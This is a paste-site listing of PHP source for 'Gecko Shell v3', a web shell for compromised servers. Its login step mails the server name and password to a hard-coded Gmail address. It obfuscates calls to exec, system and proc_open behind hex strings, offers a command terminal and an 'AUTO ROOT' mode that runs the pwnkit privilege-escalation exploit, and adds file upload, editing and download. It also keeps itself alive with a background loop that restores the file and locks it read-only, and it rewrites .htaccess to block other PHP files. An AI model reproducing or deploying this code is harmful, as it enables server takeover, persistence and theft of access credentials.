
Gecko Shell v3

Jun 5th, 2024
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PHP 59.97 KB | None | 0 0
  1. <?php
  2. session_start();
  3. @set_time_limit(0);
  4. @clearstatcache();
  5. @ini_set('error_log', NULL);
  6. @ini_set('log_errors', 0);
  7. @ini_set('max_execution_time', 0);
  8. @ini_set('output_buffering', 0);
  9. @ini_set('display_errors', 0);
  12. /* Configuration */
  13. /* Password using md5 hashes */
  14. $password = "ff901c76f51ddf1f9f3212ee01192ce3"; //Syadlasvgass@@
  15. $default_action = "FilesMan";
  16. $default_use_ajax = true;
  17. $default_charset = 'UTF-8';
  18. date_default_timezone_set("Asia/Jakarta");
  19. function login_shell()
  20. {
  21. ?>
  22.     <!DOCTYPE html>
  23.     <html lang="en">
  25.     <head>
  26.         <meta charset="UTF-8">
  27.         <meta http-equiv="X-UA-Compatible" content="IE=edge">
  28.         <meta name="viewport" content="width=device-width, initial-scale=1.0">
  29.         <style>
  30.             body {
  31.                 font-family: monospace;
  32.             }
  34.             input[type="password"] {
  35.                 border: none;
  36.                 border-bottom: 1px solid black;
  37.                 padding: 2px;
  38.             }
  40.             input[type="password"]:focus {
  41.                 outline: none;
  42.             }
  44.             input[type="submit"] {
  45.                 border: none;
  46.                 padding: 4.5px 20px;
  47.                 background-color: #2e313d;
  48.                 color: #FFF;
  49.             }
  50.         </style>
  51.     </head>
  53.     <body>
  54.         <form action="" method="post">
  55.             <div align="center">
  56.                 <input type="password" name="pass" placeholder="&nbsp;Password">&nbsp;<input type="submit" name="submit" value=">">
  57.             </div>
  58.         </form>
  59.     </body>
  61.     </html>
  62. <?php
  63.     exit;
  64. }
  65. if (!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) {
  66.     if (isset($_POST['pass']) && (md5($_POST['pass']) == $password)) {
  67.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  68.         $tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."
  69. ".$_POST['pass']; @mail('lilarsyad13@gmail.com', 'root', $tmp);
  70.     } else {
  71.         login_shell();
  73.     }
  74. }
  76. ${"GLOBALS"}["wrrdfeiqpw"] = "info";
  77. ${"GLOBALS"}["snucwrjx"] = "perms";
  78. ${"GLOBALS"}["nlqvcexcsqf"] = "readDir";
  79. ${"GLOBALS"}["lbdylir"] = "openDir";
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  81. ${"GLOBALS"}["njgztpho"] = "dir";
  82. ${"GLOBALS"}["hoapkwhmi"] = "dirs";
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  99. ${"GLOBALS"}["vrqmqvvo"] = "bytes";
  100. ${"GLOBALS"}["vhimbugtql"] = "flesName";
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  102. ${"GLOBALS"}["fqwhcuj"] = "username";
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  110. ${"GLOBALS"}["xpixzuvernku"] = "CurrentFile";
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  114. ${"GLOBALS"}["vogxys"] = "handler";
  115. ${"GLOBALS"}["nfodbdej"] = "TmpNames";
  116. ${"GLOBALS"}["vfuhqrqrce"] = "curFile";
  117. ${"GLOBALS"}["iwwhffu"] = "response";
  118. ${"GLOBALS"}["ideydyre"] = "r_text";
  119. ${"GLOBALS"}["dgeabcp"] = "_F";
  120. ${"GLOBALS"}["cukzglotbx"] = "_D";
  121. ${"GLOBALS"}["lbxiapetcw"] = "pwd";
  122. ${"GLOBALS"}["ajlwquynyp"] = "id";
  123. ${"GLOBALS"}["wptxggqoj"] = "val";
  124. ${"GLOBALS"}["pjowplcj"] = "cwd";
  125. ${"GLOBALS"}["qyzlbuwcwh"] = "file_manager";
  126. ${"GLOBALS"}["nnodyjdebeu"] = "FilesDon";
  127. ${"GLOBALS"}["eujpqmf"] = "file";
  128. ${"GLOBALS"}["upursoy"] = "cdir";
  129. ${"GLOBALS"}["snxjpduol"] = "fungsi";
  130. ${"GLOBALS"}["ypqwtxfjbdmj"] = "hitung_array";
  131. ${"GLOBALS"}["xjbxgmpvoehr"] = "id";
  132. ${"GLOBALS"}["syglgogire"] = "i";
  133. $mipsckwblnip = "fungsi";
  134. ${"GLOBALS"}["gfxtft"] = "hitung_array";
  135. $jidhrueaj = "Array";
  136. $jleuhjkosfln = "fungsi";
  137. $lfcsjy = "Array";
  138. ${$lfcsjy} = ["676574637764", "676c6f62", "69735f646972", "69735f66696c65", "69735f7772697461626c65", "69735f7265616461626c65", "66696c657065726d73", "66696c65", "7068705f756e616d65", "6765745f63757272656e745f75736572", "68746d6c7370656369616c6368617273", "66696c655f6765745f636f6e74656e7473", "6d6b646972", "746f756368", "6368646972", "72656e616d65", "65786563", "7061737374687275", "73797374656d", "7368656c6c5f65786563", "706f70656e", "70636c6f7365", "73747265616d5f6765745f636f6e74656e7473", "70726f635f6f70656e", "756e6c696e6b", "726d646972", "666f70656e", "66636c6f7365", "66696c655f7075745f636f6e74656e7473", "6d6f76655f75706c6f616465645f66696c65", "63686d6f64", "7379735f6765745f74656d705f646972",];
  139. ${${"GLOBALS"}["gfxtft"]} = count(${$jidhrueaj});
  140. $xcywwvulehrr = "get_cwd";
  141. ${"GLOBALS"}["qrysdykadehk"] = "fungsi";
  142. ${"GLOBALS"}["igplhlwerlnp"] = "i";
  143. for (${${"GLOBALS"}["igplhlwerlnp"]} = 0; ${${"GLOBALS"}["syglgogire"]} < ${${"GLOBALS"}["ypqwtxfjbdmj"]}; ${${"GLOBALS"}["syglgogire"]}++) {
  144.     $lowricyb = "Array";
  145.     $sayjcbslb = "fungsi";
  146.     ${$sayjcbslb}[] = unx(${$lowricyb}[${${"GLOBALS"}["syglgogire"]}]);
  147. }
  148. if (isset($_GET["d"])) {
  149.     ${"GLOBALS"}["xxftgcpmi"] = "cdir";
  150.     $yfpljk = "cdir";
  151.     ${${"GLOBALS"}["xxftgcpmi"]} = unx($_GET["d"]);
  152.     ${${"GLOBALS"}["snxjpduol"]}[14](${$yfpljk});
  153. } else {
  154.     ${${"GLOBALS"}["upursoy"]} = ${${"GLOBALS"}["snxjpduol"]}[0]();
  155. }
  156. $iqxsvenssxc = "get_cwd";
  157. function download($file)
  158. {
  159.     if (file_exists(${${"GLOBALS"}["eujpqmf"]})) {
  160.         header("Content-Description: File Transfer");
  161.         $qfkryzqde = "file";
  162.         header("Content-Type: application/octet-stream");
  163.         header("Content-Disposition: attachment; filename=" . basename(${${"GLOBALS"}["eujpqmf"]}));
  164.         header("Content-Transfer-Encoding: binary");
  165.         header("Expires: 0");
  166.         header("Cache-Control: must-revalidate");
  167.         header("Pragma: public");
  168.         header("Content-Length: " . filesize(${$qfkryzqde}));
  169.         ob_clean();
  170.         flush();
  171.         readfile(${${"GLOBALS"}["eujpqmf"]});
  172.         exit;
  173.     }
  174. }
  175. if ($_GET["don"] == true) {
  176.     ${${"GLOBALS"}["nnodyjdebeu"]} = download(unx($_GET["don"]));
  177. }
  178. echo "
  179. <!DOCTYPE html>
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  184.    <meta http-equiv="X-UA-Compatible" content=\"IE=edge">
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  186. echo $_SERVER["SERVER_NAME"];
  187. echo " ]</title>
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  512.         .terminal-head li a {
  513.             color: black;
  514.             position: absolute;
  515.             right: 0;
  516.             margin-right: 110px;
  517.             font-weight: bold;
  518.             margin-top: -20px;
  519.             font-size: 25px;
  520.             padding: 1px 10px;
  521.         }
  523.         .terminal-head li {
  524.             display: inline-block;
  525.             color: black;
  526.         }
  528.         .terminal-body textarea {
  529.             width: 98.5%;
  530.             margin: 4px;
  531.             resize: none;
  532.             background-color: #22242d;
  533.            color: #29db12;
  534.            border-radius: 4px;
  535.             height: 400px;
  536.             font-size: smaller;
  537.         }
  539.         .active {
  540.             display: block;
  541.         }
  543.         .terminal-body li {
  544.             display: inline-block;
  545.         }
  547.         .terminal-input {
  548.             width: 500px;
  549.             background-color: #22242d;
  550.            color: white;
  551.             padding: 6px;
  552.             border: 1px solid #22242d;
  553.            border-radius: 4px;
  554.             margin: 5px 0;
  555.         }
  556.     </style>
  557. </head>
  559. <body>
  560.     <div class="menu-header\">
  561.        <ul>
  562.            <li><i class="fa-solid fa-computer"></i>&nbsp;";
  563. echo ${$jleuhjkosfln}[8]();
  564. ${"GLOBALS"}["ojrxlurnj"] = "file_manager";
  565. echo "</li>
  566.            <li><i class="fa-solid fa-server\"></i>&nbsp;";
  567. echo $_SERVER["SERVER_SOFTWARE"];
  568. echo "</li>
  569.            <li><i class=\"fa-solid fa-network-wired"></i>&nbsp;: ";
  570. echo $_SERVER["SERVER_ADDR"];
  571. echo " |&nbsp;: ";
  572. ${"GLOBALS"}["hgrsptldxegl"] = "fungsi";
  573. echo $_SERVER["REMOTE_ADDR"];
  574. echo "</li>
  575.             <li><i class="fa-solid fa-globe"></i>&nbsp;";
  576. echo s();
  577. echo "</li>
  578.             <li><i class="fa-solid fa-user"></i>&nbsp;";
  579. echo ${$mipsckwblnip}[9]();
  580. ${"GLOBALS"}["cagmsfvd"] = "fungsi";
  581. echo "</li>
  582.             <form action=\"\" method=\"post" enctype='";
  583. echo "multipart/form-data";
  584. echo "'>
  585.                 <li class="form-upload\"><input type="submit\" value="Upload\" name="gecko-up-submit" class=\"btn-submit">&nbsp;<input type=\"file\" name=\"gecko-upload" class="form-file"></li>
  586.             </form>
  587.         </ul>
  588.     </div>
  589.     <div class="menu-tools\">
  590.        <ul>
  591.            <li><a href=\"?d=";
  592. echo hx(${${"GLOBALS"}["qrysdykadehk"]}[0]());
  593. echo "&terminal\" class=\"btn-submit\">Terminal</a></li>
  594.            <li><a href="?d=";
  595. echo hx(${${"GLOBALS"}["snxjpduol"]}[0]());
  596. echo "&terminal=root\" class="btn-submit badge-root">AUTO ROOT</a></li>
  597.            <li><a href=\"?d=";
  598. echo hx(${${"GLOBALS"}["snxjpduol"]}[0]());
  599. echo "&adminer" class=\"btn-submit">Adminer</a></li>
  600.             <li><a href=\"?d=";
  601. echo hx(${${"GLOBALS"}["hgrsptldxegl"]}[0]());
  602. echo "&destroy\" class="btn-submit\">Backdoor Destroyer</a></li>
  603.            <li><a href=\"https://www.exploit-db.com/search?q=Linux%20Kernel%20";
  604. $klpelcka = "pwd";
  605. ${"GLOBALS"}["sjuxivs"] = "fungsi";
  606. echo suggest_exploit();
  607. echo "\" class=\"btn-submit\">Linux Exploit</a></li>
  608.            <li><a href=\"?d=";
  609. ${"GLOBALS"}["wwmyjswl"] = "cwd";
  610. ${"GLOBALS"}["znumtne"] = "pwd";
  611. echo hx(${${"GLOBALS"}["cagmsfvd"]}[0]());
  612. echo "&lockshell" class="btn-submit">Lock Shell</a></li>
  613.             <li><a href=\"\" class="btn-submit\" id="lock-file\">Lock File</a></li>
  614.            <li><a href=\"\" class=\"btn-submit badge-root" id=\"root-user\">Create User</a></li>
  615.            <li><a href=\"https://github.com/MadExploits/\" class="btn-submit\">README</a></li>
  616.            <li><a href=\"?d=";
  617. echo hx(${${"GLOBALS"}["snxjpduol"]}[0]());
  618. echo "&logout=True\" class=\"btn-submit\">LOGOUT!</a></li>
  619.        </ul>
  620.    </div>
  622.    ";
  623. ${${"GLOBALS"}["qyzlbuwcwh"]} = ${${"GLOBALS"}["sjuxivs"]}[1]("{.[!.],}*", GLOB_BRACE);
  624. ${$iqxsvenssxc} = ${${"GLOBALS"}["snxjpduol"]}[0]();
  625. echo "
  626.    <div class=\"menu-file-manager\">
  627.        <ul>
  628.            <li><a href="" id="create_folder">+ Create Folder</a></li>
  629.            <li><a href="\" id="create_file">+ Create File</a></li>
  630.        </ul>
  631.        <div class=\"path-pwd">
  632.             ";
  633. ${${"GLOBALS"}["pjowplcj"]} = str_replace("\", "/", ${$xcywwvulehrr});
  634. ${$klpelcka} = explode("/", ${${"GLOBALS"}["wwmyjswl"]});
  635. foreach (${${"GLOBALS"}["znumtne"]} as ${${"GLOBALS"}["xjbxgmpvoehr"]} => ${${"GLOBALS"}["wptxggqoj"]}) {
  636.    ${"GLOBALS"}["gfmfqmoojp"] = "val";
  637.    if (${${"GLOBALS"}["gfmfqmoojp"]} == "" && ${${"GLOBALS"}["ajlwquynyp"]} == 0) {
  638.        echo "&nbsp;<a href=\"?d=" . hx("/") . "\"><i class=\"fa-solid fa-folder-plus\"></i>&nbsp;/ </a>";
  639.         continue;
  640.     }
  641.     ${"GLOBALS"}["omjbpweda"] = "i";
  642.     if (${${"GLOBALS"}["wptxggqoj"]} == "") continue;
  643.     echo "<a href="?d=";
  644.    for (${${"GLOBALS"}["syglgogire"]} = 0; ${${"GLOBALS"}["syglgogire"]} <= ${${"GLOBALS"}["ajlwquynyp"]}; ${${"GLOBALS"}["omjbpweda"]}++) {
  645.        $tfrndfywby = "id";
  646.        $kbqjerlneivw = "i";
  647.        echo hx(${${"GLOBALS"}["lbxiapetcw"]}[${$kbqjerlneivw}]);
  648.        if (${${"GLOBALS"}["syglgogire"]} != ${$tfrndfywby}) echo hx("/");
  649.    }
  650.    echo "\">" . ${${"GLOBALS"}["wptxggqoj"]} . " / " . "</a>";
  651. }
  652. ${"GLOBALS"}["dhvaoy"] = "_D";
  653. echo "<a style='font-weight:bold; color:orange;' href='?d=" . hx(__DIR__) . "'>[ HOME SHELL ]</a>";
  654. echo "        </div>
  655.        </ul>
  656.        <table style="width: 100%;">
  657.            <thead>
  658.                <tr>
  659.                    <th>Name</th>
  660.                    <th>Size</th>
  661.                    <th>Permission</th>
  662.                    <th>Action</th>
  663.                </tr>
  664.            </thead>
  665.            <form action=\"\" method="post">
  666.                <tbody>
  667.                    <!-- Gecko Folder File Manager -->
  668.                    ";
  669. foreach (${${"GLOBALS"}["ojrxlurnj"]} as ${${"GLOBALS"}["dhvaoy"]}) {
  670.     $pywhhkgke = "fungsi";
  671.     echo "                        ";
  672.     if (${$pywhhkgke}[2](${${"GLOBALS"}["cukzglotbx"]})) {
  673.         echo "                            <tr>
  674.                                <td><input type=\"checkbox" name=\"check[]" value=\"";
  675.         echo ${${"GLOBALS"}["cukzglotbx"]};
  676.         $ehsvypxf = "_D";
  677.         echo "\">&nbsp;<i class=\"fa-solid fa-folder-open\" style="color:orange;"></i>&nbsp;<a href=\"?d=";
  678.         $puqomzystyu = "_D";
  679.         echo hx(${${"GLOBALS"}["snxjpduol"]}[0]() . "/" . ${${"GLOBALS"}["cukzglotbx"]});
  680.         echo "\">";
  681.         echo ${$puqomzystyu};
  682.         echo "</a></td>
  683.                                <td>[ DIR ]</td>
  684.                                <td>
  685.                                    ";
  686.         ${"GLOBALS"}["sixbple"] = "fungsi";
  687.         $nlocfdtif = "_D";
  688.         if (${${"GLOBALS"}["snxjpduol"]}[4](${${"GLOBALS"}["snxjpduol"]}[0]() . "/" . ${${"GLOBALS"}["cukzglotbx"]})) {
  689.             echo "<font color="#00ff00\">";
  690.        } elseif (!${${"GLOBALS"}["snxjpduol"]}[5](${${"GLOBALS"}["snxjpduol"]}[0]() . "/" . ${${"GLOBALS"}["cukzglotbx"]})) {
  691.             echo "<font color="red\">";
  692.         }
  693.         echo perms(${${"GLOBALS"}["snxjpduol"]}[0]() . "/" . ${$nlocfdtif});
  694.         echo "                                </td>
  695.                                <!-- Action Folder Manager -->
  696.                                <td><a href=\"?d=";
  697.         echo hx(${${"GLOBALS"}["snxjpduol"]}[0]());
  698.         echo "&re=";
  699.         echo hx(${$ehsvypxf});
  700.         echo "\" class="badge-action-editor"><i class=\"fa-solid fa-pen-to-square\"></i></a>&nbsp;<a href=\"?d=";
  701.         echo hx(${${"GLOBALS"}["sixbple"]}[0]());
  702.         echo "&ch=";
  703.         echo hx(${${"GLOBALS"}["cukzglotbx"]});
  704.         echo "\" class=\"badge-action-chmod\"><i class=\"fa-solid fa-user-pen"></i></a></td>
  705.                             </tr>
  706.                         ";
  707.    }
  708.    echo "
  709.                     ";
  710. }
  711. echo "
  712.                     <!-- Gecko Files Manager -->
  713.                     ";
  714. foreach (${${"GLOBALS"}["qyzlbuwcwh"]} as ${${"GLOBALS"}["dgeabcp"]}) {
  715.    ${"GLOBALS"}["rsgrgcgkfv"] = "_F";
  716.    ${"GLOBALS"}["mdtskzvpl"] = "fungsi";
  717.    echo "                        ";
  718.    if (${${"GLOBALS"}["mdtskzvpl"]}[3](${${"GLOBALS"}["rsgrgcgkfv"]})) {
  719.        $bfubtphkoev = "_F";
  720.        ${"GLOBALS"}["vyxoef"] = "fungsi";
  721.        ${"GLOBALS"}["bkfssshyet"] = "_F";
  722.        $xrgcmhekw = "_F";
  723.        echo "                            <tr>
  724.                                 <td><input type=\"checkbox\" name="check[]" value="";
  725.        echo ${$bfubtphkoev};
  726.        echo "\">&nbsp;<i class="fa-solid fa-file-lines"></i>&nbsp;<a href=\"?d=";
  727.         echo hx(${${"GLOBALS"}["snxjpduol"]}[0]());
  728.         echo "&f=";
  729.         ${"GLOBALS"}["lhlxrhq"] = "fungsi";
  730.         echo hx(${$xrgcmhekw});
  731.         echo "" class=\"gecko-files">";
  732.        ${"GLOBALS"}["srmmmbgb"] = "fungsi";
  733.        echo ${${"GLOBALS"}["dgeabcp"]};
  734.        echo "</a></td>
  735.                                 <td>";
  736.        echo formatSize(filesize(${${"GLOBALS"}["dgeabcp"]}));
  737.        ${"GLOBALS"}["tzcycish"] = "_F";
  738.        echo "</td>
  739.                                 <td>
  740.                                     ";
  741.        $dmbkcmjxgn = "fungsi";
  742.        if (is_writable(${${"GLOBALS"}["vyxoef"]}[0]() . "/" . ${${"GLOBALS"}["cukzglotbx"]})) {
  743.            echo "<font color="#00ff00">";
  744.        } elseif (!is_readable(${${"GLOBALS"}["lhlxrhq"]}[0]() . "/" . ${${"GLOBALS"}["dgeabcp"]})) {
  745.            echo "<font color=\"red\">";
  746.         }
  747.         echo perms(${${"GLOBALS"}["srmmmbgb"]}[0]() . "/" . ${${"GLOBALS"}["tzcycish"]});
  748.         echo "                                </td>
  749.                                <!-- Action File Manager -->
  750.                                <td><a href=\"?d=";
  751.         echo hx(${${"GLOBALS"}["snxjpduol"]}[0]());
  752.         echo "&re=";
  753.         echo hx(${${"GLOBALS"}["bkfssshyet"]});
  754.         echo "" class="badge-action-editor\"><i class=\"fa-solid fa-pen-to-square\"></i></a>&nbsp;<a href=\"?d=";
  755.         echo hx(${${"GLOBALS"}["snxjpduol"]}[0]());
  756.         echo "&ch=";
  757.         echo hx(${${"GLOBALS"}["dgeabcp"]});
  758.         ${"GLOBALS"}["ennttlkad"] = "_F";
  759.         echo "" class=\"badge-action-chmod\"><i class=\"fa-solid fa-user-pen"></i></a>&nbsp;<a href="?d=";
  760.         echo hx(${$dmbkcmjxgn}[0]());
  761.         echo "&don=";
  762.         echo hx(${${"GLOBALS"}["ennttlkad"]});
  763.         echo "\" class=\"badge-action-download\"><i class=\"fa-solid fa-download\"></i></a></td>
  764.                            </tr>
  765.                        ";
  766.     }
  767.     echo "
  768.                    ";
  769. }
  770. echo "
  771.                </tbody>
  772.        </table>
  773.        <br>
  774.        <select name="gecko-select\" class="btn-submit\">
  775.            <option value=\"delete">Delete</option>
  776.             <option value=\"unzip">Unzip</option>
  777.             <option value="zip">Zip</option><br>
  778.         </select>
  779.         <input type="submit\" name="submit-action" value="Submit\" class="btn-submit\" style=\"padding: 8.3px 35px;\">
  780.        </form>
  782.        <!-- Modal Pop Jquery Create Folder/File By ./MrMad -->
  783.        <div class=\"modal">
  784.             <div class=\"modal-container\">
  785.                <div class=\"modal-header">
  786.                     <h3><b><i id="modal-title\">\${this.title}</i></b></h3>
  787.                </div>
  788.                <div class="modal-body\">
  789.                    <form action="\" method=\"post">
  790.                         <span id=\"modal-input"></span>
  791.                         <div class=\"modal-btn-form\">
  792.                            <input type=\"submit\" name=\"submit" value=\"Submit\" class="btn-modal-close box-shadow\">&nbsp;<button class=\"btn-modal-close box-shadow\" id="close-modal">Close</button>
  793.                        </div>
  794.                    </form>
  795.                </div>
  796.            </div>
  797.        </div>
  798.    </div>
  799.    ";
  800. if ($_GET["f"]) {
  801.     echo "        <div class="code-editor\">
  802.            <div class=\"code-editor-container">
  803.                 <div class=\"code-editor-head\">
  804.                    <h3><i class="fa-solid fa-code"></i>&nbsp; Code Editor : ";
  805.     echo unx($_GET["f"]);
  806.     echo "</h3>
  807.                </div>
  808.                <div class="code-editor-body\">
  809.                    <form action="\" method="post">
  810.                        <textarea name=\"code-editor" class=\"box-shadow" autofocus>";
  811.    echo ${${"GLOBALS"}["snxjpduol"]}[10](${${"GLOBALS"}["snxjpduol"]}[11](${${"GLOBALS"}["snxjpduol"]}[0]() . "/" . unx($_GET["f"])));
  812.    echo "</textarea>
  813.                         <div class=\"modal-btn-form">
  814.                             <input type=\"submit\" name="save-editor\" value=\"Save\" class=\"btn-modal-close">&nbsp;<button class="btn-modal-close" id="close-editor">Close</button>
  815.                         </div>
  816.                     </form>
  817.                 </div>
  818.             </div>
  819.         </div>
  820.     ";
  821. }
  822. echo "
  823.     ";
  824. if (isset($_GET["terminal"])) {
  825.    echo "        <div class=\"terminal\">
  826.            <div class=\"terminal-container">
  827.                 <div class=\"terminal-head\">
  828.                    <ul>
  829.                        <li id=\"terminal-title"><b><i class="fa-solid fa-terminal\"></i>&nbsp;TERMINAL</b></li>
  830.                        <li><a href=\"" class=\"close-terminal"><i class=\"fa-solid fa-right-from-bracket\"></i></a></li>
  831.                    </ul>
  832.                </div>
  833.                <div class="terminal-body">
  834.                    <textarea class=\"box-shadow" disabled>";
  835.    if (isset($_POST["terminal"])) {
  836.        echo ${${"GLOBALS"}["snxjpduol"]}[10](cmd($_POST["terminal-text"] . " 2>&1"));
  837.    }
  838.    echo "</textarea>
  839.                     <form action="" method=\"post\">
  840.                        <ul>
  841.                            <li><input type=\"text" name="terminal-text" class=\"terminal-input box-shadow" placeholder="";
  842.     echo ${${"GLOBALS"}["snxjpduol"]}[9]() . "@" . $_SERVER["SERVER_ADDR"];
  843.     echo "\" autofocus></li>
  844.                            <li><input type="submit\" name="terminal\" value=\">" class=\"btn-modal-close"></li>
  845.                         </ul>
  846.                     </form>
  847.                 </div>
  848.             </div>
  849.         </div>
  850.     ";
  851. }
  852. echo "
  853.     ";
  854. if ($_GET["terminal"] == "root") {
  855.    $odogsyuij = "fungsi";
  856.    echo "        <div class=\"terminal\">
  857.            <div class="terminal-container">
  858.                <div class="terminal-head">
  859.                    <ul>
  860.                        <li id=\"terminal-title"><b><i class=\"fa-solid fa-terminal"></i>&nbsp;AUTO ROOT</b></li>
  861.                         <li><a href=\"\" class=\"close-terminal\"><i class="fa-solid fa-right-from-bracket"></i></a></li>
  862.                    </ul>
  863.                </div>
  864.                <div class="terminal-body\">
  865.                    <textarea name=\"" disabled>";
  866.    if (${$odogsyuij}[3](".mad-root") && ${${"GLOBALS"}["snxjpduol"]}[3]("pwnkit")) {
  867.        $ewmuqcvmm = "response";
  868.        ${"GLOBALS"}["rimeshj"] = "fungsi";
  869.        ${$ewmuqcvmm} = ${${"GLOBALS"}["rimeshj"]}[11](".mad-root");
  870.        ${"GLOBALS"}["pnrucfmkpr"] = "r_text";
  871.        ${${"GLOBALS"}["ideydyre"]} = explode(" ", ${${"GLOBALS"}["iwwhffu"]});
  872.        if (${${"GLOBALS"}["pnrucfmkpr"]}[0] == "uid=0(root)") {
  873.            if (isset($_POST["submit-root"])) {
  874.                echo cmd("./pwnkit "" . $_POST["root-terminal"] . "  2>&1"");
  875.            }
  876.        } else {
  877.            echo "This Device Is Not Vulnerable
  878. ";
  879.            echo cmd("lsb_release -a") . "
  880. ";
  881.            echo "Kernel Version : " . suggest_exploit() . "
  882. ";
  883.        }
  884.    } else {
  885.        ${${"GLOBALS"}["snxjpduol"]}[24](".mad-root");
  886.    }
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  890.                            <li><input type=\"text\" name="root-terminal" class=\"terminal-input" placeholder=\"";
  891.     echo "root" . "@" . $_SERVER["SERVER_ADDR"];
  892.     echo "\" autofocus></li>
  893.                            <li><input type=\"submit\" name=\"submit-root\" value=">" class=\"btn-modal-close\"></li>
  894.                        </ul>
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  897.            </div>
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  899.    ";
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  908.    echo unx($_GET["re"]);
  909.    echo "</i></b></h3>
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  911.                 <div class="modal-body">
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  921.        </div>
  922.    ";
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  924. echo "
  925.    ";
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  929.                <div class="modal-header">
  930.                    <h3><b><i id="modal-title\">Change Permission : ";
  931.     echo unx($_GET["ch"]);
  932.     echo "</i></b></h3>
  933.                </div>
  934.                <div class="modal-body">
  935.                    <form action="" method="post">
  936.                        <span id=\"modal-input"><input type="number\" name="chFile" class=\"modal-create-input" placeholder="0775"></span>
  937.                         <div class="modal-btn-form\">
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  940.                    </form>
  941.                </div>
  942.            </div>
  943.        </div>
  944.        </div>
  945.    ";
  946. }
  947. echo "
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  997. ";
  998. if (isset($_GET["lockshell"])) {
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  1016.        ${"GLOBALS"}["cmtlkbi"] = "curFile";
  1017.        ${"GLOBALS"}["awjjksll"] = "TmpNames";
  1018.        $btcufyjqga = "fungsi";
  1019.        cmd("rm -rf " . ${${"GLOBALS"}["awjjksll"]} . "/.sessions/." . base64_encode(${$btcufyjqga}[0]() . remove_dot(${${"GLOBALS"}["bmvgwnxbcio"]}) . "-text"));
  1020.        cmd("rm -rf " . ${${"GLOBALS"}["nfodbdej"]} . "/.sessions/." . base64_encode(${${"GLOBALS"}["snxjpduol"]}[0]() . remove_dot(${${"GLOBALS"}["cmtlkbi"]}) . "-handler"));
  1021.    }
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  1023.    ${"GLOBALS"}["adfvwfpqx"] = "handler";
  1024.    $jadnlsj = "curFile";
  1025.    mkdir(${${"GLOBALS"}["qmlakymll"]} . "/.sessions");
  1026.    cmd("cp $curFile " . ${$jknnjceqxq} . "/.sessions/." . base64_encode(${${"GLOBALS"}["snxjpduol"]}[0]() . remove_dot(${${"GLOBALS"}["vfuhqrqrce"]}) . "-text"));
  1027.    $ehhejlebpl = "fungsi";
  1028.    chmod(${${"GLOBALS"}["vfuhqrqrce"]}, 0444);
  1029.    $lkbiqkuwg = "fungsi";
  1030.    ${${"GLOBALS"}["adfvwfpqx"]} = "
  1031. <?php
  1032. @ini_set("max_execution_time\", 0);
  1033. while (True){
  1034.    if (!file_exists("" . __DIR__ . "\")){
  1035.        mkdir("" . __DIR__ . "\");
  1036.    }
  1037.    if (!file_exists(\"" . ${$lkbiqkuwg}[0]() . "/" . ${${"GLOBALS"}["vfuhqrqrce"]} . "")){
  1038.         \$text = base64_encode(file_get_contents(\"" . ${${"GLOBALS"}["ytpsdrzovm"]} . "/.sessions/." . base64_encode(${$ehhejlebpl}[0]() . remove_dot(${$jadnlsj}) . "-text") . ""));
  1039.         file_put_contents(\"" . ${${"GLOBALS"}["snxjpduol"]}[0]() . "/" . ${${"GLOBALS"}["vfuhqrqrce"]} . "", base64_decode(\$text));
  1040.     }
  1041.     if (gecko_perm(\"" . ${$dbpnkmsfi}[0]() . "/" . ${$enznadbms} . "\") != 0444){
  1042.        chmod(\"" . ${${"GLOBALS"}["snxjpduol"]}[0]() . "/" . ${$isohmvpx} . "", 0444);
  1043.     }
  1044. }
  1046. function gecko_perm(\$flename){
  1047.     return substr(sprintf("%o\", fileperms(\$flename)), -4);
  1048. }
  1049. ";
  1050.     $nbxxth = "hndlers";
  1051.     ${$zvtyjjr} = ${${"GLOBALS"}["jmvkaguf"]}[28](${$bdoupnyyd} . "/.sessions/." . base64_encode(${${"GLOBALS"}["snxjpduol"]}[0]() . remove_dot(${${"GLOBALS"}["utpijttxc"]}) . "-handler") . "", ${${"GLOBALS"}["vogxys"]});
  1052.     if (${$nbxxth}) {
  1053.         ${"GLOBALS"}["crgdxzpu"] = "fungsi";
  1054.         cmd("php " . ${${"GLOBALS"}["nfodbdej"]} . "/.sessions/." . base64_encode(${${"GLOBALS"}["crgdxzpu"]}[0]() . remove_dot(${${"GLOBALS"}["vfuhqrqrce"]}) . "-handler") . " > /dev/null 2>/dev/null &");
  1055.     } else {
  1056.         failed();
  1057.     }
  1058. }
  1059. if (isset($_POST["gecko-up-submit"])) {
  1060.     $ovodrch = "fungsi";
  1061.     ${"GLOBALS"}["dblstedt"] = "tmpName";
  1062.     ${"GLOBALS"}["ykovngbq"] = "tmpName";
  1063.     ${${"GLOBALS"}["tskfcwedkdet"]} = $_FILES["gecko-upload"]["name"];
  1064.     ${${"GLOBALS"}["ykovngbq"]} = $_FILES["gecko-upload"]["tmp_name"];
  1065.     if (${$ovodrch}[29](${${"GLOBALS"}["dblstedt"]}, ${${"GLOBALS"}["snxjpduol"]}[0]() . "/" . ${${"GLOBALS"}["tskfcwedkdet"]})) {
  1066.         success();
  1067.     } else {
  1068.         failed();
  1069.     }
  1070. }
  1071. if ($_GET["logout"] == True) {
  1072.     session_destroy();
  1073.     session_unset();
  1074.     success();
  1075. }
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  1080.     ${$sscohen} = trim(basename($_SERVER["SCRIPT_FILENAME"]));
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  1084.         ${${"GLOBALS"}["yyxroabywchy"]} = "
  1085. <FilesMatch "\.(php|ph*|Ph*|PH*|pH*)\$">
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  1088. <FilesMatch \"^(" . ${${"GLOBALS"}["xpixzuvernku"]} . "|index.php|wp-config.php|wp-includes.php)\$">
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  1093. </FilesMatch>";
  1094.         ${"GLOBALS"}["xbvdxflvcc"] = "put_htt";
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  1096.         $umjimuogf = "put_htt";
  1097.         ${${"GLOBALS"}["xbvdxflvcc"]} = ${${"GLOBALS"}["mgsqrjmx"]}[28](${${"GLOBALS"}["wfwlsa"]} . "/.htaccess", ${${"GLOBALS"}["gxytrvgtc"]});
  1098.         if (${$umjimuogf}) {
  1099.             success();
  1100.         } else {
  1101.             failed();
  1102.         }
  1103.     } else {
  1104.         failed();
  1105.     }
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  1107. if (isset($_POST["save-editor"])) {
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  1109.     ${"GLOBALS"}["pcqiaeue"] = "save";
  1110.     ${"GLOBALS"}["helvhc"] = "fungsi";
  1111.     $blekadey = "fungsi";
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  1113.     if (${${"GLOBALS"}["qlquuf"]}) {
  1114.         success();
  1115.     } else {
  1116.         failed();
  1117.     }
  1118. }
  1119. if (isset($_GET["adminer"])) {
  1120.     ${"GLOBALS"}["oichbkmzrll"] = "fungsi";
